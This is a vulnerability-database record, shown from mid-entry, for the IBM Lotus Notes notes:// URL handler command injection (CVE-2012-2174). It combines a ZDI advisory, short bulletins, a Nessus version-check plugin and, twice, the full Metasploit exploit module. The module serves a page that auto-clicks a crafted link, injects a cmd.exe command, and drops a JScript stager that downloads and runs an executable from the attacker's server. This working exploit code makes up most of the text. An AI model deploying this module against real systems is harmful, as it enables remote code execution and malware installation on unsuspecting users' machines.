discovery\r\n\t\t\t\t\t'Sean de Regge', # Vulnerability analysis\r\n\t\t\t\t\t'juan vazquez' # Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-2174' ],\r\n\t\t\t\t\t[ 'OSVDB', '83063' ],\r\n\t\t\t\t\t[ 'BID', '54070' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => \"none\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -k -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' 
=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 18 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@exe_name = rand_text_alpha(2) + \".exe\"\r\n\t\t@stage_name = rand_text_alpha(2) + \".js\"\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_new_session(session)\r\n\t\tif session.type == \"meterpreter\"\r\n\t\t\tsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n\t\tend\r\n\r\n\t\t@dropped_files.delete_if do |file|\r\n\t\t\twin_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n\t\t\tif session.type == \"meterpreter\"\r\n\t\t\t\tbegin\r\n\t\t\t\t\twintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n\t\t\t\t\twin_file = \"#{wintemp}\\\\#{win_file}\"\r\n\t\t\t\t\t# Meterpreter should do this automatically as part of\r\n\t\t\t\t\t# fs.file.rm(). 
Until that has been implemented, remove the\r\n\t\t\t\t\t# read-only flag with a command.\r\n\t\t\t\t\tsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n\t\t\t\t\tsession.fs.file.rm(win_file)\r\n\t\t\t\t\tprint_good(\"Deleted #{file}\")\r\n\t\t\t\t\ttrue\r\n\t\t\t\trescue ::Rex::Post::Meterpreter::RequestError\r\n\t\t\t\t\tprint_error(\"Failed to delete #{win_file}\")\r\n\t\t\t\t\tfalse\r\n\t\t\t\tend\r\n\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tif request.uri =~ /\\.exe$/\r\n\t\t\treturn if ((p=regenerate_payload(cli))==nil)\r\n\t\t\tregister_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\")\r\n\t\t\tregister_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\")\r\n\t\t\tdata = generate_payload_exe({:code=>p.encoded})\r\n\t\t\tprint_status(\"Sending payload\")\r\n\t\t\tsend_response(cli, data, {'Content-Type'=>'application/octet-stream'})\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tif datastore['SSL']\r\n\t\t\tschema = \"https\"\r\n\t\telse\r\n\t\t\tschema = \"http\"\r\n\t\tend\r\n\t\turi = \"#{schema}://#{my_host}\"\r\n\t\turi << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\"\r\n\r\n\t\tscript = \"var w=new ActiveXObject('wscript.shell');\"\r\n\t\tscript << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\"\r\n\t\tscript << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\"\r\n\t\tscript << \"x.open('GET','#{uri}', false);\"\r\n\t\tscript << \"x.send();\"\r\n\t\tscript << \"var s=new ActiveXObject('ADODB.Stream');\"\r\n\t\tscript << \"s.Mode=3;\"\r\n\t\tscript << \"s.Type=1;\"\r\n\t\tscript << \"s.Open();\"\r\n\t\tscript << \"s.Write(x.responseBody);\"\r\n\t\tscript << \"s.SaveToFile('#{@exe_name}',2);\"\r\n\t\tscript << \"w.Run('#{@exe_name}');\"\r\n\r\n\t\tvmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\"\r\n\r\n\t\tlink_id = rand_text_alpha(5 + rand(5))\r\n\r\n\t\tjs_click_link = %Q|\r\n\t\tfunction clickLink(link) {\r\n\t\t\tvar cancelled = false;\r\n\r\n\t\t\tif (document.createEvent) {\r\n\t\t\t\tvar event = document.createEvent(\"MouseEvents\");\r\n\t\t\t\tevent.initMouseEvent(\"click\", true, true, window,\r\n\t\t\t\t\t0, 0, 0, 0, 0,\r\n\t\t\t\t\tfalse, false, false, false,\r\n\t\t\t\t\t0, null);\r\n\t\t\t\tcancelled = !link.dispatchEvent(event);\r\n\t\t\t}\r\n\t\t\telse if (link.fireEvent) {\r\n\t\t\t\tcancelled = !link.fireEvent(\"onclick\");\r\n\t\t\t}\r\n\r\n\t\t\tif (!cancelled) {\r\n\t\t\t\twindow.location = link.href;\r\n\t\t\t}\r\n\t\t}\r\n\t\t|\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)\r\n\t\t\tjs_click_link.obfuscate\r\n\t\t\tjs_click_link_fn = js_click_link.sym('clickLink')\r\n\t\telse\r\n\t\t\tjs_click_link_fn = 'clickLink'\r\n\t\tend\r\n\r\n\r\n\t\thtml = 
<<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js_click_link}\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\">\r\n\t\t<a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status(\"Sending html\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n\tend\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23650/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-2174"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-154 : IBM Lotus Notes URL Command Injection Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-154\r\nAugust 22, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-2174\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\nIBM\r\n\r\n- -- Affected Products:\r\nIBM Lotus Notes\r\n\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11839.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of IBM Lotus Notes. User interaction is required\r\nto exploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within notes.exe. 
When handling URLs, it is\r\npossible to inject the -RPARAMS command line argument into the call to\r\nnotes.exe, which will then launch rcplauncher.exe. Including the java -vm\r\ncommand will allow for the attacker to execute code under the context of\r\nthe process.\r\n\r\n- -- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. More details can be\r\nfound at:\r\nhttp://www-304.ibm.com/support/docview.wss?uid=swg21598348\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-12-22 - Vulnerability reported to vendor\r\n2012-08-22 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n* Moritz Jodeit\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBUDUEz1VtgMGTo1scAQJ/bggAqlRPPa/9m/PYcfpm1w/66uerv/HUV9m8\r\nZgBA6/EUsl83PNb3BeCgqJprCv3GM3J6knYTVO1RC5DDc5Z3f2XWN1gmZC9b7ZGj\r\nFb6O+A710Yfw7VfUxsBfcNuobQreS5e8sV1Rr9YV+grWHzonObPyT6JSTYPb0Ldi\r\nIlnlILy6CDrFafmDW16l6yir5lBQ5TCdtstbPCO5A+IJT911KXo44fGuO5hc+1VQ\r\n9Zy+L9By/onjFA9AdH/WH62lp0NmUkDJX0yydlnNNlOEEF0fnBqNBPxQSnMWr5Cl\r\n6THwlcLwGYFm/bSHh7D7F3BOpspWh/VuulRvNnkSEZxNS+xnrj3Hcg==\r\n=gM97\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-08-27T00:00:00", "published": "2012-08-27T00:00:00", "id": "SECURITYVULNS:DOC:28414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28414", "title": "ZDI-12-154 : IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:48", "bulletinFamily": "software", "cvelist": ["CVE-2012-2174"], "description": "URI handler command injection.", "edition": 1, "modified": "2012-08-27T00:00:00", "published": "2012-08-27T00:00:00", "id": "SECURITYVULNS:VULN:12529", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12529", "title": "IBM Lotus Notes code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:50:39", "description": "CVE 
ID: CVE-2012-2174\r\n\r\nIBM Lotus Notes is a desktop client that gives users a single point of access to help them create, find and share knowledge, collaborate with teams and take action.\r\n\r\nIBM Lotus Notes 8.0.2, 8.5, 8.5.1, 8.5.2 and 8.5.3 contain a flaw in the \"notes\" URI handler that can be exploited to execute arbitrary commands.\n0\nIBM Lotus Notes 8.x\nVendor patch:\r\n\r\nIBM\r\n---\r\nIBM has released a security bulletin (1598348) and a corresponding patch for this issue:\r\n\r\n1598348: Security Bulletin: IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability (CVE-2012-2174)\r\n\r\nLink: http://www-304.ibm.com/support/docview.wss?uid=swg21598348", "published": "2012-06-23T00:00:00", "type": "seebug", "title": "IBM Lotus Notes 8.x \"notes\" URI Handler Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-06-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60226", "id": "SSV:60226", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T03:34:52", "description": "The remote host has a version of Lotus Notes prior to 8.5.3 Fix Pack\n2 installed. It is, therefore, reportedly affected by a remote code\nexecution vulnerability that an attacker can exploit by tricking a\nvictim into clicking a specially crafted 'notes://' URL. 
\n\nNote that this vulnerability can only be exploited when the software\nis running in 'standard' mode.", "edition": 29, "published": "2012-08-10T00:00:00", "title": "IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ibm:lotus_notes"], "id": "LOTUS_NOTES_8_5_3_FP2.NASL", "href": "https://www.tenable.com/plugins/nessus/61487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61487);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n\n script_name(english:\"IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution\");\n script_summary(english:\"Checks version of IBM Lotus Notes\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has software installed that is affected by a code\nexecution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host has a version of Lotus Notes prior to 8.5.3 Fix Pack\n2 installed. It is, therefore, reportedly affected by a remote code\nexecution vulnerability that an attacker can exploit by tricking a\nvictim into clicking a specially crafted 'notes://' URL. 
\n\nNote that this vulnerability can only be exploited when the software\nis running in 'standard' mode.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-154/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2012/Aug/275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-01.ibm.com/support/docview.wss?uid=swg21598348\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Lotus Notes 8.5.3 Fix Pack 2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM Lotus Notes Client URL Handler Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:lotus_notes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"lotus_notes_installed.nasl\");\n script_require_keys(\"SMB/Lotus_Notes/Installed\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"IBM Lotus Notes\";\nkb_base = \"SMB/Lotus_Notes/\";\n\nversion = get_kb_item_or_exit(kb_base + 'Version');\npath = get_kb_item_or_exit(kb_base + 'Path');\nver_ui = get_kb_item_or_exit(kb_base + 'Version_UI');\n\nfix = '8.5.32.12184';\n\nif (\n version =~ \"^8\\.\" &&\n ver_compare(ver:version, fix:fix, strict:FALSE) == -1\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver_ui + \n '\\n Fixed version : 8.5.3 FP2 (' + fix + ')' +\n '\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n} \nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver_ui, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:27", "bulletinFamily": "info", "cvelist": ["CVE-2012-2174"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Lotus Notes. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within notes.exe. When handling URLs, it is possible to inject the -RPARAMS command line argument into the call to notes.exe, which will then launch rcplauncher.exe. 
Including the java -vm command will allow for the attacker to execute code under the context of the process.", "modified": "2012-06-22T00:00:00", "published": "2012-08-22T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-154/", "id": "ZDI-12-154", "title": "IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:02:54", "description": "This module exploits a command injection vulnerability in the URL handler for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with a specially crafted notes:// URL to execute arbitrary commands with also arbitrary arguments. This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\n", "published": "2012-12-24T15:23:19", "type": "metasploit", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/NOTES_HANDLER_CMDINJECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\",\n 'Description' => %q{\n This module exploits a command injection vulnerability in the URL handler for\n the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. 
This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Moritz Jodeit', # Vulnerability discovery\n 'Sean de Regge', # Vulnerability analysis\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2012-2174' ],\n [ 'OSVDB', '83063' ],\n [ 'BID', '54070' ],\n [ 'ZDI', '12-154' ],\n [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],\n [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"none\",\n 'InitialAutoRunScript' => 'migrate -k -f'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-18',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def exploit\n @exe_name = rand_text_alpha(2) + \".exe\"\n @stage_name = rand_text_alpha(2) + \".js\"\n super\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n\n @dropped_files.delete_if do |file|\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n begin\n wintemp = session.sys.config.getenv('TEMP')\n win_file = \"#{wintemp}\\\\#{win_file}\"\n # Meterpreter should do this automatically as part of\n # fs.file.rm(). 
Until that has been implemented, remove the\n # read-only flag with a command.\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n print_error(\"Failed to delete #{win_file}\")\n false\n end\n end\n end\n\n end\n\n def on_request_uri(cli, request)\n\n if request.uri =~ /\\.exe$/\n return if ((p=regenerate_payload(cli))==nil)\n register_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\")\n register_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\")\n data = generate_payload_exe({:code=>p.encoded})\n print_status(\"Sending payload\")\n send_response(cli, data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n if datastore['SSL']\n schema = \"https\"\n else\n schema = \"http\"\n end\n uri = \"#{schema}://#{my_host}\"\n uri << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\"\n\n script = \"var w=new ActiveXObject('wscript.shell');\"\n script << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\"\n script << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\"\n script << \"x.open('GET','#{uri}', false);\"\n script << \"x.send();\"\n script << \"var s=new ActiveXObject('ADODB.Stream');\"\n script << \"s.Mode=3;\"\n script << \"s.Type=1;\"\n script << \"s.Open();\"\n script << \"s.Write(x.responseBody);\"\n script << \"s.SaveToFile('#{@exe_name}',2);\"\n script << \"w.Run('#{@exe_name}');\"\n\n vmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\"\n\n link_id = rand_text_alpha(5 + rand(5))\n\n js_click_link = %Q|\n function clickLink(link) {\n var cancelled = false;\n\n if (document.createEvent) {\n 
var event = document.createEvent(\"MouseEvents\");\n event.initMouseEvent(\"click\", true, true, window,\n 0, 0, 0, 0, 0,\n false, false, false, false,\n 0, null);\n cancelled = !link.dispatchEvent(event);\n }\n else if (link.fireEvent) {\n cancelled = !link.fireEvent(\"onclick\");\n }\n\n if (!cancelled) {\n window.location = link.href;\n }\n }\n |\n\n if datastore['OBFUSCATE']\n js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)\n js_click_link.obfuscate(memory_sensitive: true)\n js_click_link_fn = js_click_link.sym('clickLink')\n else\n js_click_link_fn = 'clickLink'\n end\n\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js_click_link}\n </script>\n </head>\n <body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\">\n <a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a>\n </body>\n </html>\n EOS\n\n print_status(\"Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/notes_handler_cmdinject.rb"}]}